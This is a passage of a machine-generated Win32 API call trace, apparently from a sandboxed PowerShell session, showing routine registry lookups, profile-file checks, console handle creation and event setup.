lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc9c, lpData=0x0, lpcbData=0x16dc98*=0x0 | out: lpType=0x16dc9c*=0x1, lpData=0x0, lpcbData=0x16dc98*=0x56) returned 0x0 [0093.216] CoTaskMemAlloc (cb=0x5a) returned 0x30bc00 [0093.216] RegQueryValueExW (in: hKey=0x3c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc6c, lpData=0x30bc00, lpcbData=0x16dc68*=0x56 | out: lpType=0x16dc6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dc68*=0x56) returned 0x0 [0093.216] CoTaskMemFree (pv=0x30bc00) [0093.217] RegCloseKey (hKey=0x3c4) returned 0x0 [0093.217] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd18 | out: phkResult=0x16dd18*=0x3c4) returned 0x0 [0093.217] RegQueryValueExW (in: hKey=0x3c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc9c, lpData=0x0, lpcbData=0x16dc98*=0x0 | out: lpType=0x16dc9c*=0x1, lpData=0x0, lpcbData=0x16dc98*=0x56) returned 0x0 [0093.217] CoTaskMemAlloc (cb=0x5a) returned 0x30bc00 [0093.217] RegQueryValueExW (in: hKey=0x3c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc6c, lpData=0x30bc00, lpcbData=0x16dc68*=0x56 | out: lpType=0x16dc6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dc68*=0x56) returned 0x0 [0093.217] CoTaskMemFree (pv=0x30bc00) [0093.217] RegCloseKey (hKey=0x3c4) returned 0x0 [0093.218] CoTaskMemAlloc (cb=0x20c) returned 0x2f98a0 [0093.218] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2f98a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0093.218] CoTaskMemFree (pv=0x2f98a0) [0093.218] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0093.218] CoTaskMemAlloc (cb=0x20c) returned 0x2f98a0 [0093.218] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2f98a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0093.218] CoTaskMemFree (pv=0x2f98a0) [0093.218] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0093.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0093.220] SetErrorMode (uMode=0x1) returned 0x1 [0093.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc80 | out: lpFileInformation=0x16dc80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0093.221] SetErrorMode (uMode=0x1) returned 0x1 [0093.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0093.221] SetErrorMode (uMode=0x1) returned 0x1 [0093.221] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc80 | out: lpFileInformation=0x16dc80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0093.221] SetErrorMode (uMode=0x1) returned 0x1 [0093.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0093.221] SetErrorMode (uMode=0x1) returned 0x1 [0093.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc80 | out: lpFileInformation=0x16dc80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0093.221] SetErrorMode (uMode=0x1) returned 0x1 [0093.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0093.221] SetErrorMode (uMode=0x1) returned 0x1 [0093.222] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc80 | out: lpFileInformation=0x16dc80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0093.222] SetErrorMode (uMode=0x1) returned 0x1 [0093.223] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.223] CoTaskMemFree (pv=0x2e4780) [0093.232] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0093.239] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0093.240] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0093.247] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0093.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0093.249] ReadFile (in: hFile=0x108, lpBuffer=0x2d7d1d8, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x16dad8, lpOverlapped=0x0 | out: lpBuffer=0x2d7d1d8*, lpNumberOfBytesRead=0x16dad8*=0x400, lpOverlapped=0x0) returned 1 [0093.256] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0093.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0093.258] CloseHandle (hObject=0xf) returned 1 [0093.261] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.261] CoTaskMemFree (pv=0x2e4780) [0093.262] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.262] CoTaskMemFree (pv=0x2e4780) [0093.264] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.264] CoTaskMemFree (pv=0x2e4780) [0093.267] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.267] CoTaskMemFree (pv=0x2e4780) [0093.271] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.272] CoTaskMemFree (pv=0x2e4780) [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x310 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x314 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348 [0093.273] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c [0093.275] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.275] CoTaskMemFree (pv=0x2e4780) [0093.279] SetEvent (hEvent=0x3b0) returned 1 [0093.279] SetEvent (hEvent=0x3c4) returned 1 [0093.279] SetEvent (hEvent=0x388) returned 1 [0093.279] SetEvent (hEvent=0x3ac) returned 1 [0093.279] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350 [0093.281] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.281] CoTaskMemFree (pv=0x2e4780) [0093.282] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db18 | out: phkResult=0x16db18*=0x354) returned 0x0 [0093.282] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da9c, lpData=0x0, lpcbData=0x16da98*=0x0 | out: lpType=0x16da9c*=0x0, lpData=0x0, lpcbData=0x16da98*=0x0) returned 0x2 [0201.568] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0201.574] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0201.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0201.580] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0201.580] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0201.586] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0201.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0201.587] CloseHandle (hObject=0xf) returned 1 [0201.587] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x374 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x16c [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x170 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2f0 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1d4 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1dc [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d8 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x384 [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc [0201.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0201.589] SetEvent (hEvent=0x170) returned 1 [0201.589] SetEvent (hEvent=0x378) returned 1 [0201.589] SetEvent (hEvent=0x374) returned 1 [0201.589] SetEvent (hEvent=0x16c) returned 1 [0201.589] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0201.589] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db18 | out: phkResult=0x16db18*=0x38c) returned 0x0 [0201.590] RegQueryValueExW (in: hKey=0x38c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da9c, lpData=0x0, lpcbData=0x16da98*=0x0 | out: lpType=0x16da9c*=0x0, lpData=0x0, lpcbData=0x16da98*=0x0) returned 0x2 [0202.273] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0202.281] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0202.282] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0202.287] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0202.288] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0202.293] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0202.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0202.294] CloseHandle (hObject=0xf) returned 1 [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3cc [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a4 [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d0 [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d8 [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3dc [0202.295] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0202.296] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e4 [0202.296] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0202.296] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0202.296] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0202.296] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0202.296] SetEvent (hEvent=0x3d0) returned 1 [0202.296] SetEvent (hEvent=0x3cc) returned 1 [0202.296] SetEvent (hEvent=0x3a4) returned 1 [0202.296] SetEvent (hEvent=0x3d4) returned 1 [0202.296] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0202.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db18 | out: phkResult=0x16db18*=0x3fc) returned 0x0 [0202.297] RegQueryValueExW (in: hKey=0x3fc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da9c, lpData=0x0, lpcbData=0x16da98*=0x0 | out: lpType=0x16da9c*=0x0, lpData=0x0, lpcbData=0x16da98*=0x0) returned 0x2 [0202.838] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0202.843] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0202.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0202.848] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0202.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0202.852] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0202.853] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0202.853] CloseHandle (hObject=0xf) returned 1 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x418 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x424 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x428 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x42c [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x430 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x434 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438 [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x43c [0202.854] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x440 [0202.855] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x444 [0202.855] SetEvent (hEvent=0x420) returned 1 [0202.855] SetEvent (hEvent=0x41c) returned 1 [0202.855] SetEvent (hEvent=0x418) returned 1 [0202.855] SetEvent (hEvent=0x424) returned 1 [0202.855] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x448 [0202.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db18 | out: phkResult=0x16db18*=0x44c) returned 0x0 [0202.855] RegQueryValueExW (in: hKey=0x44c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da9c, lpData=0x0, lpcbData=0x16da98*=0x0 | out: lpType=0x16da9c*=0x0, lpData=0x0, lpcbData=0x16da98*=0x0) returned 0x2 [0203.218] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0203.225] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0203.225] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0203.231] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0203.232] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0203.237] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0203.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1 [0203.238] CloseHandle (hObject=0xf) returned 1 [0203.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x468 [0203.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x464 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x470 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x46c [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x474 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x478 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x47c [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x480 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x484 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x488 [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x48c [0203.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x490 [0203.240] SetEvent (hEvent=0x46c) returned 1 [0203.241] SetEvent (hEvent=0x468) returned 1 [0203.241] SetEvent (hEvent=0x464) returned 1 [0203.241] SetEvent (hEvent=0x470) returned 1 [0203.241] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x494 [0203.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db18 | out: phkResult=0x16db18*=0x498) returned 0x0 [0203.241] RegQueryValueExW (in: hKey=0x498, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da9c, lpData=0x0, lpcbData=0x16da98*=0x0 | out: lpType=0x16da9c*=0x0, lpData=0x0, lpcbData=0x16da98*=0x0) returned 0x2 Thread: id = 19 os_tid = 0x358 Thread: id = 20 os_tid = 0xaec Thread: id = 21 os_tid = 